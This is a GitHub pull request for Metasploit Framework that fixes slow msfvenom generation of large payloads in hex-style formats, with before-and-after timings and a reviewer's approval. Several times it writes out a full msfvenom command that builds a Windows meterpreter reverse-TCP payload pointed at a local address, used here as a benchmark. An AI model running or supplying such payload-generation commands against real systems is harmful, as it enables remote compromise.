Fix slow msfvenom payload generation for large payloads when outputting as hex format #17368

adfoster-r7

Fix slow msfvenom payload generation for large payloads when outputting as hex format

Pulls in rapid7/rex-text#59
Fixes #17245

Verification

Master:

$ time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f csharp
...
-- 333.91s user 24.30s system 99% cpu 5:59.45 total

This branch:

$ time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f csharp
...
-- 7.25s user 6.48s system 95% cpu 14.376 total

@gwillcox-r7 gwillcox-r7 self-assigned this Dec 13, 2022
@gwillcox-r7 gwillcox-r7 added the rn-enhancement release notes enhancement label Dec 13, 2022
@gwillcox-r7

Before:

I gave up waiting cause geezus it was slow as heck:

  │  ~/git/metasploit-framework │   master *1 ?16  time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f csharp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload

^CError: 
./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -  948.64s user 6.28s system 90% cpu 17:40.55 total
  │  ~/git/metasploit-framework │   master *1 ?16  

After:

  │  ~/git/metasploit-framework │   land-pr17368:pr/17368 *1 ?16  time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f csharp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 175686 bytes
Final size of csharp file: 893104 bytes
./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -  21.51s user 3.48s system 94% cpu 26.393 total
  │  ~/git/metasploit-framework │   land-pr17368:pr/17368 *1 ?16 

@gwillcox-r7

LGTM, will land this now.

@gwillcox-r7 gwillcox-r7 merged commit c7ed5f4 into rapid7:master Dec 13, 2022
@gwillcox-r7

gwillcox-r7 commented Dec 13, 2022

Release Notes

Fixes a regression issue with msfvenom payload generation for large payloads taking more than 5 minutes to generate when outputting as hex format. Now it takes a few seconds as normal.

@adfoster-r7 adfoster-r7 deleted the fix-slow-msfvenom-payload-generation-for-large-payloads branch December 13, 2022 10:11
@adfoster-r7 adfoster-r7 added bug rn-fix release notes fix and removed enhancement rn-enhancement release notes enhancement labels Dec 13, 2022
Successfully merging this pull request may close these issues.

msfvenom did not generate stageless meterpreter in c